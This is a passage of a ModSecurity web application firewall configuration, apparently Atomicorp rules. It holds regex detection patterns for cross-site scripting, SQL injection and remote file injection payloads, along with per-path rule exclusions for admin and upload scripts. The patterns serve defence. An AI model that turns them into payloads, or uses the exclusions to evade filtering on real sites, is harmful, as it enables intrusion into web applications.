!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340837,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

SecMarker END_RULES_91543

SecRule REQUEST_FILENAME "/forum/post\.php" "phase:2,id:91544,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/crop_auto\.php" "phase:2,id:91545,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340008"

SecRule REQUEST_FILENAME "/admin/main\.php" "phase:2,id:91546,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/thumb\.php" "phase:2,id:91547,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/com_virtuemart/fetchscript\.php" "phase:2,id:91548,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340026"

SecRule REQUEST_FILENAME "/uploader\.php" "phase:2,id:91549,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/survey/preview\.php" "phase:2,id:91550,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91551,t:none,pass,nolog,skipAfter:END_RULES_91551"

SecRule REQUEST_URI|ARGS|!ARGS:/survey/|ARGS_NAMES|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340840,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"

# Rule 340148:  XSS injection
SecRule REQUEST_URI|ARGS|!ARGS:/survey/|ARGS_NAMES|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340841,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

# Rule 340149:  XSS injection
SecRule REQUEST_URI|ARGS|!ARGS:/survey/|!ARGS:embeddump|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340842,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

SecMarker END_RULES_91551

SecRule REQUEST_FILENAME "/linkmachine\.php" "phase:2,id:91552,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/productadd\.php" "phase:2,id:91553,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144"
SecAction "phase:2,id:91554,t:none,pass,nolog,skipAfter:END_RULES_91554"

SecRule ARGS|!ARGS:create|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340843,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"

SecMarker END_RULES_91554

SecRule REQUEST_FILENAME "/admint/" "phase:2,id:91555,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/setupctcform\.php" "phase:2,id:91556,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/db\.php" "phase:2,id:91557,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019"


SecRule REQUEST_FILENAME "/admin-translate/" "phase:2,id:91558,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/mailtemplate_outpay1_result\.php" "phase:2,id:91559,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/" "phase:2,id:91560,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:91561,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/socialware/popups/add_friend\.php" "phase:2,id:91562,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/open\.php" "phase:2,id:91563,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:91564,t:none,pass,nolog,skipAfter:END_RULES_91564"

SecRule ARGS|!ARGS:/site/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:340844,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/site/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:340845,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91564

SecRule REQUEST_FILENAME "/order/totals\.php" "phase:2,id:91565,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91566,t:none,pass,nolog,skipAfter:END_RULES_91566"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/token/|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340846,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:token/|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340847,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

# Rule 340149:  XSS injection
SecRule REQUEST_URI|ARGS|!ARGS:/token/|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340848,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

SecMarker END_RULES_91566

SecRule REQUEST_FILENAME "/admin/write\.php" "phase:2,id:91567,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91568,t:none,pass,nolog,skipAfter:END_RULES_91568"

